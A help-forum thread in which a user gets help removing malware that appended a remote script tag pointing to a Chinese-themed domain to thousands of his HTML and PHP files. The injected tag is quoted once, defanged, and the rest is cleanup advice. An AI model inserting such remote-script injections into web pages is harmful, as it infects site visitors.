Weird Script in all PHP and HTML

I have found a weird script that automatically inserts itself in all PHP an HTML code that I generate on my machine.

I ran all the clean utilities here on MG to get rid of some other malware and thanks a million it worked.

Here is what I have found in all my code.???

<script src=http://tw.love_china.tw._cn/count/js/gif.gif></script>

I intentionally added an Underscore after love and tw(dot).

It will insert itself at the bottom of every code page.

Has anyone ever heard of this irritating script. I know it must be a Trojan and from what I have found maybe a W32 variety.

TIA

Charlie Howe
The problem is that it tries to go to the site and Macromedia will error out when I try to open it.

 

Welcome to MajorGeeks.com!

Please follow the instructions in the below link and attach the requested logs when you finish these instructions.

• READ & RUN ME FIRST. Malware Removal Guide

• If something does not run, write down the info to explain to us later but keep on going.

• Do not assume that because one step does not work that they all will not.

Notes:

1. If you run into problems trying to run theREAD & RUN ME or any of the scans in normal boot mode. You can run steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
   
   • Starting your computer in Safe mode
2. If you have problems downloading on the problem PC, download the tools on another PC and burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can spread to them.

 

Ok, I have done all the steps over 3 hours worth...

I still get the malware code inserted into my HTML editor (FP2003).

Attached are the logs as you wished.

Note that the "nortons.exe" is still running and nothing removed it. I believe that is a worm, is it not?

TIA

Charlie Howe

 

Adding last log file...

Charlie Howe

 

Pre-Instructions:

1. First, please disable any antivirus and/or antispy programs you have installed so they will not block this fix.
   
2. Print out these instructions or save them to a text file so that you can operate with All Browser Windows CLOSED.

Step 1:
Run C:\MGtools\analyse.exe by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator). This is really HijackThis (select Do a system scan only) and select the following lines but DO NOT CLICK FIX until you exit all browser sessions including the one you are reading in right now:

Again, make sure ALL browser windows are closed when you click FIX.

Step 2:
Now we need to use ComboFix to remove a bunch of malware files.

• Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
  • If it is not on your Desktop, the below will not work.
• Open Notepad and copy/paste the text in the below quote box into it:

• Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
• At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
• You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
• Now use your mouse to drag CFscript.txt on top of ComboFix.exe
• Follow the prompts.
• When it finishes, a log will be produced named c:\combofix.txt
• I will ask for this log below

Note:

Do not mouseclick combofix's window while it is running. That may cause it to stall.

Step 3:
Default Security Settings

To Default Security Settings:
For Internet Explorer 6 users:
Click Start > Run > type inetcpl.cpl and press ENTER, when Internet Properties comes up navigate to the Security Tab and click Default Level for the following:

• Internet
• Local Intranet
• Trusted Sites
• Restricted Sites.

Click OK to exit.

For Internet Explorer 7 users:
Click Start > Run > type inetcpl.cpl and press ENTER, when Internet Properties comes up, navigate to the Security Tab and simply click the "Reset all zones to default level" button. Click OK to exit.

Step 4:
Please download ATF Cleaner by Atribune. This program does not require an installation. The executable actually runs the program.

NOTE: This program is for Windows XP and Windows 2000 only. ATF Cleaner will remove all files from the items that are checked so if you have some cookies you'd like to save. Please move them to a different directory first.

• Double-click ATF-Cleaner.exe to run the program.
• Under Main choose: Select All
• Click the Empty Selected button.

If you use Firefox browser

• Click Firefox at the top and choose: Select All
• Click the Empty Selected button.
  • NOTE: If you would like to keep your saved passwords, please click No at the prompt.

If you use Opera browser

• Click Opera at the top and choose: Select All
• Click the Empty Selected button.
  • NOTE: If you would like to keep your saved passwords, please click No at the prompt.

Click Exit on the Main ATF Cleaner menu to close the program.


Step 5:
Now run the C:\MGtools\GetLogs.bat file by double clicking on it (Note: if using Vista, don't double click, use right click and select Run As Administrator).

Then attach the below logs:

• C:\ComboFix.txt
• C:\MGlogs.zip

Let me know of any problems you may have encountered with the above instructions and also let me know how things are running now.

 

BJ,

Thanks for all of your help!

Unfortunately, I still have the code inserted by something!

See the attached image.

Also see the logs attached.

I appreciate you guys!

Charlie

 

First, are you familiar with the below items?

Now we need to use ComboFix to remove a few items.

• Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
  • If it is not on your Desktop, the below will not work.
• Open Notepad and copy/paste the text in the below quote box into it:

• Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
• At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
• You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
• Now use your mouse to drag CFscript.txt on top of ComboFix.exe
• Follow the prompts.
• When it finishes, a log will be produced named c:\combofix.txt
• I will ask for this log below

Note:

Do not mouseclick combofix's window while it is running. That may cause it to stall.

Once you complete this post, attach the new ComboFix Log.

 

Thanks BJ,

Still have the same problem...

Could the FP 2003 have a default page that has been updated by a virus? the problem still happens. We may have gotten the infected files, but this seems to be a remnant it left behind.

Attached is the combofix log file.

Any other Ideas??

I know that this is perplexing, and I really appreciate your time.


BTW - Internet Marketing Center, MLM3 and webpage downloader, I am familiar with...

Charlie Howe
Dallas, TX ( formerly LA Guy - Lower Alabama)

 

BJ,

OMG.....

I have done a search on my machine and found that over 4000 HTML files contain "lovechina".

Some of the files I have had on my machine are dated as early as 2003???:cry

It is the last line in the HTML files.

Obviously, I have not opened ALL of the files, but the "lovechina" code is the last line in EVERY file!

This is a BIG deal. beacuse the web pages that have been generated try to run that malicious script ever time they are accessed.

Please help!

Charlie

 

BJ, et.al

Great News,

I downloaded a little tool called Turbo SR and it went through my whole hard drive and replaced all of the instances of the "lovechina" script with " ".

It found and replaced the strings on HTM, HTML, PHP and JS files where the malware had put the malicious code.

I feel strongly that your help geting rid of the malicious routines has helped me tremendously.

Now all I had to do was clean up the templates and the other files where it had already placed itself. Use of the TurboSR was priceless. It is a FREE download.

Thanks so much for your help and have a great weekend! :wave

Charlie Howe
Dallas, TX

 

I did not see this in your logs, the reason is the logs we use does not show files that have been there a while as it appears these have been.

Are you having any current problems?

 

BJ,

All seems to be OK now!

I have been in DReamweaver and FP all day re-uploading over 1280 HTML pages out to the internet!

I really approeciate what you did for me!

One question:

Why Did I never find an instance all over the Internet in all of my searches that no one person has ever had this type of Malware?

I searched for the string "lovechina" everywhere and even tried to check some forums for HTML code involuntary inserts.

I had that string in over 4800 files. It sure had to be some malicious thing that put it there. I wish I knew the name of the virus/malware that put it there and I would shout it to the hills and get everyone to MG to get it fixed.

Thanks again,

Charlie Howe
Dallas, TX :cool

 

The names malware uses vary so no infection is the same. It's hard to say how this happened but it was probably one of the malware files that put it there.